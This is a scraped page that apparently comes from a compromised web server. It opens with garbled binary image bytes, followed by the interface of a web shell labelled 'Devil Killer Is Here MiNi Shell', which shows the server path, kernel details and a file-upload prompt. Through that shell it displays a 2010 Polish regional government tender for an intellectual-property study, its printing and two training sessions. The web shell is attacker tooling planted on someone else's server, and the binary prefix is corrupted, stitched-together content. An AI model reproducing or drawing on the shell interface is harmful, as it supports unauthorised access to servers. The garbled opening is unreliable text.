JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100716/212270-N-2010.html

<p class="kh_header"><b>Gdańsk: wykonanie opracowania nt. Identyfikacji stosowanych na świecie modeli zarządzania własnością intelektualną wraz z projektem graficznym, drukiem opracowania na potrzeby realizacji projektu INNOpomorze- partnerstwo dla innowacji, finansowanego z poddziałania 8.2.2. POKL, oraz przeprowadzenie  dwóch  szkoleń w zakresie przygotowywania i negocjacji umów dotyczących własności intelektualnej</b><br>
<b>Numer ogłoszenia: 212270 - 2010; data zamieszczenia: 16.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.woj-pomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie opracowania nt. Identyfikacji stosowanych na świecie modeli zarządzania własnością intelektualną wraz z projektem graficznym, drukiem opracowania na potrzeby realizacji projektu INNOpomorze- partnerstwo dla innowacji, finansowanego z poddziałania 8.2.2. POKL, oraz przeprowadzenie  dwóch  szkoleń w zakresie przygotowywania i negocjacji umów dotyczących własności intelektualnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie opracowania nt. Identyfikacji stosowanych na świecie modeli zarządzania własnością intelektualną wraz z projektem graficznym,  drukiem opracowania na potrzeby realizacji projektu INNOpomorze - partnerstwo dla innowacji, finansowanego z poddziałania 8.2.2. POKL oraz przeprowadzeniu  dwóch  szkoleń w zakresie przygotowywania i negocjacji umów dotyczących własności intelektualnej. Wykonawca będzie zobowiązany do uwzględnienia i stosowania, na potrzeby realizacji niniejszego zamówienia, Wytycznych Ministerstwa Rozwoju Regionalnego, dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz Planu Komunikacji Programu Operacyjnego Kapitał Ludzki 2007-2013 obowiązujących na dzień wykonania usług, dotyczących w szczególności prawidłowego oznakowania materiałów, powstających w wyniku realizacji projektów, finansowanych ze środków PO KL. 

 Przystępując do realizacji zamówienia Wykonawca powinien zapoznać się z następującymi dokumentami,
1. Regionalny Program Operacyjny dla Województwa Pomorskiego na lata 2007-2013
2. Regionalna Strategia Innowacji dla Województwa Pomorskiego RIS-P
3. Program Operacyjny Kapitał Ludzki (PO KL) 2007-2013
4. Szczegółowy opis priorytetów Programu Operacyjnego Kapitał Ludzki 2007 - 2013
5. Wytyczne Ministerstwa Rozwoju Regionalnego w zakresie informacji i promocji
6. Strategia komunikacji funduszy europejskich w Polsce na lata 2007 - 2013
7.Księga Systemu Identyfikacji Wizualnej Urzędu Marszałkowskiego Województwa Pomorskiego

Obowiązujące wersje dokumentów wymienionych w pkt. 1 - pkt. 6 dostępne są na stronach internetowych: http:www.mrr.gov.pl oraz http:www.woj-pomorskie.pl. 

Dokument, o którym mowa w pkt. 7 zostanie na etapie realizacji umowy przekazany Wykonawcy na płycie CD w formacie PDF. 


I. Opracowanie merytoryczne opracowania 

1. Odbiorcami opracowania będą przedstawiciele nauki, biznesu, instytucji otoczenia biznesu oraz administracji z województwa pomorskiego. 


2. Objętość opracowania:

- ilość stron opracowania została podana dla znormalizowanego maszynopisu -1800 
   znaków na stronę w tym spacje i znaki interpunkcyjne 
      - ilość stron opracowania po wydrukowaniu wyniesie 150 - 160 stron plus okładka

3. W ramach opracowania merytorycznego Wykonawca odpowiedzialny będzie za przygotowanie na podstawie analizy dostępnych wtórnych źródeł (analiza ,desk research) i innych zaproponowanych przez Wykonawcę metod badawczych opracowania, zgodnie ze spisem treści obejmującym, co najmniej:
1. Wprowadzenie do zagadnienia własności intelektualnej
               1.1. Własność w ujęciu ekonomicznym i prawnym
     1.2. Własność intelektualna
     1.3. Prawa autorskie
                   1.3.1. Zakres prawa autorskich. Autorskie prawa osobiste i autorskie 
                                       prawa majątkowe
                             1.3.2. Przenoszenie autorskich praw majątkowych
                             1.3.3. Licencjonowanie autorskich praw majątkowych
                             1.3.4. Autorskie prawa zależne
                             1.3.5. Roszczenia w przypadku naruszenia praw autorskich.
               1.4 Własność przemysłowa
                             1.4.1. Zakres ochrony własności przemysłowej
                             1.4.2. Przenoszenie i licencjonowanie własności przemysłowej
                             1.4.3. Roszczenia w przypadku naruszenia praw własności przemysłowej
                             1.4.4.Ochrona przed nieuczciwą konkurencją i nieuczciwymi praktykami 
                                       rynkowymi w zakresie podróbek i naśladownictwa.
         2.  Ochrona własności intelektualnej 
    2.1. Historia ochrony własności intelektualnej i najważniejsze akty prawne
    2.2. Przedmioty własności przemysłowej
    2.3. Procedury uzyskania ochrony
3. Zarządzanie własnością intelektualną w przedsiębiorstwie 
    3.1. Zasady i funkcje zarządzania własnością intelektualną
    3.2. Zarządzanie własnością intelektualną a zarządzanie wiedzą 
              3.3. Strategia przedsiębiorstwa w zarządzaniu kapitałem intelektualnym 
    3.4. Sposoby zarządzania kapitałem intelektualnym w przedsiębiorstwie
    3.5. Jak kreować wartość przedsiębiorstwa z wiedzy i pomysłów ? ( modele  
                     ofensywne, defensywne, monopolistyczne ) 
    3.6. Konsekwencje zawłaszczenia pomysłu z pominięciem obowiązujących procedur 
    3.7.  Tajemnica przedsiębiorstwa (know-how) 
4.  Zarządzanie własnością intelektualną w działalności badawczo-rozwojowej
        4.1 Stan realizacji podejmowanych działań w zakresie własności intelektualnej w 
       największych uczelniach wyższych w województwie pomorskim (min. na 
       Uniwersytecie Gdańskim,  Politechnice Gdańskiej, Gdańskim Uniwersytecie 
       Medycznym)
     4.2.Funkcjonujące wzorce rozwiązań zagranicznych a możliwość ich adaptacji na 
                     grunt polski
     4.3.Zmiana podejścia jednostki badawczo-rozwojowej do odnoszenia korzyści 
                     materialnej z własności intelektualnej
     4.4.Strategia zarządzania własnością intelektualną w działalności badawczo-
                     rozwojowej
          5. Decyzja o ochronie - koszty i korzyści dla województwa pomorskiego z ochrony 
               własności intelektualnej 
     5.1.Scieżka postępowania
     5.2.Realny koszt ochrony patentowej
     5.3.Ochrona własności intelektualnej szansą na wzmocnienie konkurencyjności 
                      województwa pomorskiego 
     5.4. Przygotowanie dokumentacji od ochrony własności intelektualnej ( przykładowe 
                      wzory umów dotyczące własności intelektualnej, możliwe do zastosowania przez 
                     pomorskie uczelnie )
     5.5. Możliwości finansowania ochrony własności intelektualnej 
          6.  Podsumowanie
6.1. Rekomendacje dla samorządu województwa pomorskiego, jednostek badawczo-rozwojowych i przedsiębiorstw z województwa pomorskiego 
4. Przedstawiony powyżej spis treści nie stanowi zamkniętego katalogu, ale jest jedynie bazą dla Wykonawcy. Prezentowany spis treści ma posłużyć do wytyczenia kierunków opracowania, ma stanowić swoiste ramy, które Wykonawca wypełni treścią i poszerzy o elementy tu nie ujęte, a niezbędne, konieczne lub nawet sporadycznie występujące w trakcie realizacji opracowania. Nie należy traktować zestawionego zbioru haseł, jako spisu treści przygotowanego opracowania. 

5. Wykonawca przedstawi Zamawiającemu do akceptacji, zgodnie z harmonogramem stanowiącym załącznik nr 6 do SIWZ, spis treści i krótkie (do 5 000 znaków ze spacjami) streszczenie opracowania. Przedstawienie do akceptacji spisu treści i streszczenia opracowania, powinno nastąpić drogą elektroniczną w postaci edytowalnego pliku.doc. Zamawiający ma maksymalnie 5 dni roboczych od daty otrzymania pliku, na akceptację bądź zgłoszenie uwag do zaproponowanego spisu treści i streszczenia opracowania. W przypadku zgłoszenia uwag przez Zamawiającego, Wykonawca ma 5 dni roboczych od otrzymania uwag, na ich wprowadzenie. 

6. Wykonawca przedstawi Zamawiającemu do akceptacji, zgodnie z harmonogramem, 2 części opracowania i przekaże je każdorazowo drogą elektroniczną w postaci edytowalnego pliku.doc. Zamawiający, ma maksymalnie 5 dni roboczych od dnia otrzymania poszczególnych części treści opracowania na akceptację lub wniesienie uwag do zaproponowanych poszczególnych części treści opracowania. W przypadku wniesienia uwag przez Zamawiającego Wykonawca ma 5 dni roboczych na ich wprowadzenie.
 
7. Ponadto Wykonawca będzie zobowiązany do napisania opracowania w języku przystępnym (specjalistyczne terminy i pojęcia zostaną wyjaśnione na końcu opracowania w formie glosariusza) jak również stosowania zasad dotyczących oznakowania obowiązujących na dzień realizacji całości opracowania z zastosowaniem wytycznych dotyczących oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

8. Przekazanie wersji elektronicznej opracowania:

- Wykonawca dokona zapisu na płycie CD lub DVD:
a) ostatecznej wersji opracowania w formatach: PDF screen i Press oraz w wersji otwartej, do edycji Adobe InDesign,
b) zdjęć w formacie JPG,
c) grafiki pozazdjęciowej,
d) ostatecznej wersji opracowania w plikach Word i przekaże płytę Zamawiającemu pocztą, przesyłką kurierską lub osobiście na adres: ul. Rzeźnicka 58, 80-822 Gdańsk w terminie określonym w harmonogramie.


 II. Projekt graficzny opracowania

1. Wykonawca przedstawi Zamawiającemu 5 projektów graficznych opracowania, adekwatnych do przedmiotu zamówienia. Z przedstawionych projektów graficznych Zamawiający wybierze jeden projekt graficzny opracowania, z zastrzeżeniem, że może zgłosić do niego swoje uwagi. Wykonawca będzie zobowiązany do ich wprowadzenia. Zamawiający może także w całości odrzucić przygotowane przez Wykonawcę projekty graficzne i żądać przygotowania 3 nowych projektów graficznych opracowania.

2. Wykonawca zapewni zdjęcia i grafikę adekwatne do tematyki poszczególnych rozdziałów opracowania.

3. Wykonawca przygotuje tabele, wykresy lub inną grafikę, zwiększającą atrakcyjność i przejrzystość przekazywanych treści opracowania. Elementy graficzne opracowania będą stanowić ok. 10-15% objętości.

4. Wykonawca dokona redakcji językowej i adjustacji tekstów oraz składu, łamania i opracowania komputerowego opracowania (zastosowanych tablic, map, tytułów opisów, układu tabelarycznego, indeksów, przypisów, bibliografii, tekstów, wykresów, tabel, i innej grafiki) zgodnie z Zasadami składu tekstów w języku polskim(PN-83P-55366 lub równoważna).

5. Wykonawca zobowiązany będzie do opracowania graficznego i składu oraz wydruku opracowania zgodnie z Systemem Identyfikacji Wizualnej Zamawiającego. 


III. Wydruk opracowania

1. Parametry techniczne druku dla opracowania (SZCZEGÓŁOWA SPECYFIKACJA WYDRUKU):

Format:                                              B5 
Orientacja:                                         pionowa 
OKŁADKA:
- Surowiec:                     	kreda błysk 250 g/m2 
- Kolory:                          	4+1 (CMYK)
- Uszlachetniania:          	lakier offsetowy 1+0
WNĘTRZE:
- Surowiec:                     	offset 80g/m2 
- Kolory:                         	1+1  (wykresy i rysunki w kolorze 4+4 (CMYK)
- Uszlachetniania:          	brak
SKŁAD:
- Introligatornia:            	oprawa szyta i klejona
- Pakowanie:                  	paczki
- Dostawa z wyładunkiem:  	spakowanych egzemplarzy opracowania,
			   	do siedziby Zamawiającego, przy ul. Rzeźnickiej 58,
				80-822 Gdańsk

NAKŁAD:        			300 egzemplarzy opracowania

PLIK ŹRÓDŁOWY: 
            -Okładka: Corel Draw 11 oraz Adobe InDesign, Adobe Illustrator

            - Wnętrze: MS Word 2003 oraz PDF wykonany z pliku MS Word, Adobe InDesign, 
                Adobe Ilustrator


2. Wykonawca dokona korekty technicznej (sprawdzenie zgodności składu z oryginałem oraz wyznaczenie i poprawienie ewentualnych błędów technicznych powstałych na etapie składania) oraz wprowadzi korektę wydawniczą (wprowadzenie ewentualnych poprawek merytorycznych przez Zamawiającego) z możliwością do 30% zmian.

3. Wykonawca będzie zobowiązany do korekty po składzie opracowania, w tym:

-	korekty językowej (sprawdzenia pisowni i poprawności gramatycznej),
-	redakcji stylistycznej (naniesienia poprawek stylistycznych),
-	uspójnienia (ujednolicenia) terminologii i stylu w obrębie danego tekstu,
-	poprawienia usterek powstałych na etapie składu. 

4. Korekta będzie przeprowadzana na wydrukach tekstu opracowania sporządzonych po składzie, przy użyciu znormalizowanych znaków korektorskich (PN-72/P-55036 lub równoważna).
Wykonawca będzie zobowiązany do weryfikacji układu wizualnego tekstu oraz szaty graficznej opracowania po składzie.

5. Wydruk tekstu opracowania sporządzony po I składzie wraz z uwagami naniesionymi podczas korekty, Wykonawca dostarczy osobiście lub pocztą kurierską, w celu weryfikacji wyników korekty lub wprowadzenia dodatkowych zmian w jednym egzemplarzu (druk 1 egzemplarza opracowania według SZCZEGÓŁOWEJ SPECYFIKACJI WYDRUKU), do siedziby Zamawiającego.  

6. Do przedstawionego tekstu opracowania po składzie jak również uwag wynikających z korekty wykonanej przez Wykonawcę, Zamawiający ma prawo zgłosić uwagi, zmiany, które Wykonawca zobowiązany jest uwzględnić i wprowadzić do tekstu opracowania (II skład).

7. Po naniesieniu poprawek i uwag zgłoszonych przez Zamawiającego w stosunku do tekstu opracowania po I składzie, Wykonawca przygotuje i dostarczy Zamawiającemu wydruk sporządzony po II składzie, w jednym egzemplarzu (druk dwustronny z drukarki w układzie właściwym dla rozmiaru opracowania) zachowując terminy określone w harmonogramie stanowiącym Załącznik nr 6 do Specyfikacji Istotnych Warunków Zamówienia.

8. Do przedstawionego tekstu opracowania po II składzie, Zamawiający ma prawo zgłosić uwagi i zmiany, które Wykonawca zobowiązany jest uwzględnić i wprowadzić do tekstu opracowania (III skład przed skierowaniem do druku). Wykonawca będzie mógł przystąpić do prac związanych z drukiem opracowania, po wprowadzeniu zmian i uwzględnieniu uwag zgłoszonych przez Zamawiającego na tym etapie i zatwierdzeniu tekstu opracowania do druku przez Zmawiającego na piśmie lub poprzez pocztę elektroniczną. W przypadku, gdy w wyniku weryfikacji tekstu opracowania po II składzie, okaże się, że Wykonawca nie uwzględnił w ocenie Zamawiającego istotnych zmian, Zamawiający może żądać przed ostateczną akceptacją, dostarczenia wydruku opracowania po III składzie. 

 Druk opracowania nastąpi po zatwierdzeniu opracowania do druku.

 
IV. Organizacja i przeprowadzenie 2 szkoleń 

1. Wykonawca zorganizuje i przeprowadzi 2 szkolenia w zakresie przygotowywania i negocjacji umów dotyczących własności intelektualnej w zakresie zarządzania własnością intelektualną w terminie od 30 dni od daty podpisania umowy nie później niż do dnia 13 grudnia 2010 r., przy czym szkolenia powinny zostać zakończone najpóźniej do dnia 13 grudnia 2010 r. Szkolenia przeprowadzone zostaną dla naukowców i przedsiębiorców z województwa pomorskiego oraz na terenie województwa pomorskiego.

2. Zamawiający przedstawi Wykonawcy na 10 dni roboczych przed terminem szkolenia listę osób, do których Wykonawca wyśle min. drogą mailową zaproszenie do udziału w szkoleniu. Wykonawca poinformuje uczestników szkoleń, że udział w szkoleniu nie zostanie potwierdzony certyfikatem. 

3. Wykonawca zapewni salę szkoleniową przystosowaną do udziału 30 uczestników szkolenia, wyposażoną w urządzenia multimedialne, bądź możliwość podłączenia własnego sprzętu multimedialnego, który zapewni także Wykonawca.

4. Wykonawca na każdym szkoleniu zapewni materiały szkoleniowe każdemu z uczestników (30 szt. kompletnych materiałów dla uczestników szkolenia + 1 komplet dla Zamawiającego, każdy komplet materiałów zawierać będzie min. wydrukowane slajdy prezentacji power point, długopis, agendę szkolenia), Wykonawca zobowiązany będzie załączyć do każdego kompletu materiałów szkoleniowych, materiały przekazane przez Zamawiającego (publikacje, ulotki, broszury). 

5. Wykonawca przygotuje agendę szkolenia. Proponowana agenda szkolenia zostanie przekazana Zamawiającemu najpóźniej w terminie 5 dni roboczych przed terminem szkolenia. Zamawiający ma prawo wnieść uwagi do agendy szkolenia w terminie 2 dni roboczych od przekazania agendy, a Wykonawca zobowiązany będzie do ich uwzględnienia. 

6. Termin i miejsce każdego ze szkoleń zostaną uzgodnione z Zamawiającym, przy czym termin i miejsce szkolenia zostaną wskazane Zamawiającemu najpóźniej w terminie 5 dni roboczych przed realizacją szkolenia.

7. Wykonawca zapewni podczas każdej przerwy w czasie szkoleń catering: I -sza przerwa kawowa - 20 minut: napoje ciepłe: kawa, herbata; napoje zimne: woda niegazowana, woda gazowana, 3 rodzaje soków tzw. 100 %, wyżywienie: 3 rodzaje ciasta, 3 rodzaje ciastek, tzw. kruchych; II przerwa obiadowa - 30 minut: napoje ciepłe: kawa, herbata; napoje zimne: woda niegazowana, woda gazowana, 3 rodzaje soków tzw. 100 %, wyżywienie: ciepła zupa, drugie danie: porcja mięsa, ziemniaków i bukiet jarzyn (min. 3 rodzaje warzyw składających się na bukiet jarzyn). W ramach cateringu dla 30 uczestników + prowadzącego, na każdym szkoleniu zostanie zapewniona dostawa cateringu, obsługa oraz dekoracja stołów. Wykonawca zapewni odpowiednią ilość osób do obsługi m.in. 3 osoby, w celu sprawnej organizacji cateringu. 

8. Wykonawca dostarczy do siedziby Zamawiającego (ul. Rzeźnicka 58, 80-822 Gdańsk), listę obecności uczestników szkolenia, w terminie 3 dni roboczych od każdego przeprowadzonego szkolenia. Lista obecności zawierać będzie min. 5 kolumn (imię, nazwisko, instytucja, adres e-mail, własnoręczny podpis przeszkolonego). 

9. Czas trwania szkolenia wynosić będzie od 5 do 7 godzin zegarowych, w zależności od potrzeb zrealizowania wymaganego zakresu merytorycznego tematyki, przy czym dyskusja podczas szkolenia zajmie od 20 - 30 procent czasu trwania całego szkolenia.


V. Informacje dodatkowe

1. Wykonanie przedmiotu zamówienia zostanie szczegółowo opisane w raporcie końcowym, przekazanym: 
a.	w formie pisemnej - 1 egzemplarz, 
b.	w formie elektronicznej na płycie CD/DVD - 1 egzemplarz. 
2. Wykonawca przeniesie na Zamawiającego autorskie prawa majątkowe do powstałego w wyniku realizacji zamówienia utworu w rozumieniu ustawy o prawie autorskim i prawach pokrewnych , wraz z prawem do dokonywania zmian w treści tekstu oraz z prawem publikowania powstałego utworu na stronach należących do Zamawiającego.  
3. W przypadku braku zastrzeżeń do wykonanych prac, po zrealizowaniu każdego etapu umowy, przyjęcie prac nastąpi poprzez podpisanie protokołu zdawczo-odbiorczego.

4.Osobą, upoważnioną do podpisania protokołu zdawczo - odbiorczego dzieła, o którym mowa w pkt. 3 jest Dyrektor Departamentu Rozwoju Gospodarczego Urzędu Marszałkowskiego Województwa Pomorskiego i z-ca Dyrektora Departamentu Rozwoju Gospodarczego Urzędu Marszałkowskiego Województwa Pomorskiego. Każda z wymienionych osób jest upoważniona do samodzielnego podpisania protokołu. 


Ponadto w trakcie realizacji całości zamówienia:

1. Wykonawca zobowiązuje się do uwzględniania uwag zgłaszanych przez Zamawiającego.

2. Wykonawca zobowiązany będzie do uwzględniania w opracowaniu zasad dotyczących oznakowania obowiązujących na dzień realizacji całości opracowania z zastosowaniem wytycznych dotyczących oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

3. Wykonawca zobowiązany będzie do pozostawania w stałym kontakcie (telefonicznym i e-mailowym,) z Zamawiającym w godzinach 7:45 - 15:45 od poniedziałku do piątku, Wykonawca zobowiązany jest do wyznaczenia osoby do kontaktów roboczych.

4. Wykonawca zobowiązany będzie do informowania o stanie prac, pojawiających się problemach i innych zagadnieniach istotnych dla realizacji opracowania (na bieżąco).

5. Zamawiający ma możliwość wielokrotnego zgłaszania uwag do treści lub formy opracowania. Wykonawca powinien uwzględnić uwagi lub zastrzeżenia zgłoszone przez Zamawiającego i przekazać nową wersję opracowania lub odnieść się do nich. Uwagi lub zastrzeżenia Zamawiającego powinny być zgłaszane w terminie nie późniejszym niż 10 dni roboczych od daty otrzymania opracowania lub jej poprawionej wersji. Zamawiający zastrzega sobie prawo do wnoszenia kolejnych uwag lub zastrzeżeń w terminach wskazanych powyżej w sytuacji, gdy Wykonawca nie uwzględni wszystkich jego uwag lub zastrzeżeń zgłoszonych uprzednio..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 92.31.22.10-6, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia kwoty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.2.1w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie każdą z trzech wymienionych usług, w tym jedną z nich o wartości nie mniejszej niż 100 000 zł brutto, polegających na:
a)wykonaniu badań dotyczących poziomu innowacyjności regionu,
b)wykonaniu analiz dotyczących zagadnień związanych 
z zarządzaniem własnością intelektualną
c)wykonaniu opracowania obejmującego analizę potencjału innowacyjnego firm, uczelni oraz jednostek badawczo-naukowych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. posiadają przeciętne roczne zatrudnienie w okresie ostatnich trzech lat, (przed upływem terminu składania ofert), a jeżeli okres prowadzenia działalności jest  krótszy, w okresie od rozpoczęcia działalności - co najmniej 5 pracowników  zatrudnionych na umowę o pracę,
2. zapewnienie realizacji przedmiotu zamówienia przez zespół, składający się co najmniej z pięciu członków, posiadających łącznie następujące kwalifikacje i doświadczenie:

a)	w zakresie zarządzania własnością intelektualną oraz komercjalizacją rozwiązań innowacyjnych (wdrażania innowacyjnych produktów i technologii) 
b)	w zakresie projektowania strategii wdrażania innowacji oraz  budowania strategii rozwojowej przedsiębiorstw
c)	w zakresie zarządzania procesami innowacyjnymi i/lub usług innowacyjnych
d)	  Lider zespołu posiadający następujące kwalifikacje: wykształcenie wyższe, co najmniej 5 lat doświadczenia zawodowego, w tym 3 lata doświadczenia w zakresie zarządzania własnością intelektualną oraz komercjalizacją rozwiązań innowacyjnych, w tym odpowiedzialny jako lider zespołu za przygotowanie i wdrożenie przynajmniej 2 strategii wdrażania innowacji w przedsiębiorstwie, jednostce naukowo - badawczej, uczelni
e)	w Zespole muszą być specjaliści z wykształceniem wyższym o  
następujących kierunkach: ekonomiczne, prawnicze, administracyjne, z których przynajmniej trzech posiada dorobek w postaci autorstwa lub współautorstwa co najmniej dwóch opracowań dotyczących zarządzania własnością intelektualną i  komercjalizacją rozwiązań innowacyjnych oraz zagadnień  dotyczących wdrażania i finansowania innowacji
